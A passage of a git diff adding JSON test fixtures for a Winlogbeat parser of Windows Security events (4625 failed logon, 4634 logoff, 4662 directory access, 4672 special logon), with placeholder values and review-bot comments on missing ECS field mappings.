+ ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + 
"hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..035469c13 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": 
"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. 
It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:42:47.895000Z",
+ "action": {
+ "id": 4634,
+ "outcome": "success",
+ "properties": {
+ "LogonType": "3",
+ "TargetDomainName": "J_DOE",
+ "TargetLogonId": "0x5ed35bb6",
+ "TargetUserName": "ACCOUNT",
+ "TargetUserSid": "S-1-2-3"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "user": [
+ "ACCOUNT"
+ ]
+ },
+ "user": {
+ "domain": "J_DOE",
+ "id": "S-1-2-3",
+ "name": "ACCOUNT",
+ "target": {
+ "domain": "J_DOE",
+ "name": "ACCOUNT"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.jdoe.com",
+ "event_id": "4634",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x5ed35bb6",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 704,
+ "thread": {
+ "id": 6336
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "15983780774",
+ "task": "Logoff"
+ }
+ }
+}
\ No newline at end of file
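Review bot: The 4634 expected block carries no `event.type` (or any ECS categorization) although the 4625 fixture earlier in this commit normalizes its event object to `"type": ["start"]`; a logoff is the `end` of that same session, so rules that key on ECS categorization will see the logon but never the matching logoff. I cannot see the parser from this diff, so this may be a deliberate scope limit — if so, a line in the intake documentation listing which Security event IDs receive ECS categorization would spare the next reader the comparison. The block also sets `user.target.name`/`user.target.domain` to the same values as `user.name`/`user.domain`; for a logoff the target is the only account involved, so the duplication is harmless, but it is worth stating as intended so nobody later "fixes" one side.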
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json
new file mode 100644
index 000000000..3f1de8e53
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4662.json
@@ -0,0 +1,105 @@ +{ + "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic 
Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler 
l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + 
"SubjectLogonId": "0xc2b9d138",
+ "SubjectUserName": "ACCOUNT01$",
+ "SubjectUserSid": "S-1-2-3"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "12345678-1234-5678-9012-345678901234",
+ "id": "abcdefab-cdef-abcd-efab-cdefabcdefab",
+ "name": "ACCOUNT01",
+ "type": "winlogbeat",
+ "version": "8.12.2"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "account01",
+ "id": "11111111-2222-aaaa-bbbb-333333333333",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "account01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "account01"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "ACCOUNT01.domain.local",
+ "event_id": "4662",
+ "keywords": [
+ "Succ\u00e8s de l\u2019audit"
+ ],
+ "logon": {
+ "id": "0xc2b9d138"
+ },
+ "opcode": "Informations",
+ "process": {
+ "pid": 744,
+ "thread": {
+ "id": 864
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "476080242",
+ "task": "Directory Service Access"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json
new file mode 100644
index 000000000..ec935a02c
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4672.json
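Review bot: The 4662 expected block maps nothing from `SubjectUserName`, `SubjectDomainName` and `SubjectUserSid` — there is no `user` object and no `related.user` — while the 4672 and 4689 fixtures in this same commit populate `user.name`, `user.domain`, `user.id` and `related.user` from exactly those fields. 4662 (Directory Service Access) is the event that tells a defender who touched a directory object, and here the object-level data (`ObjectType`, `Properties`, `AccessMask`) lands only in `action.properties`, so without the subject the event cannot be pivoted on the actor with the same ECS fields as the rest of the Security channel. If the parser intentionally skips the subject for 4662 the fixture still codifies that gap and it should be recorded in the intake documentation; otherwise the parser mapping should be extended and this expected block gains `"user": {"domain": "DOMAIN", "id": "S-1-2-3", "name": "ACCOUNT01"}` plus `"related": {..., "user": ["ACCOUNT01"]}` (with or without the `$` suffix, whichever normalization the project settles on).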
@@ -0,0 +1,82 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 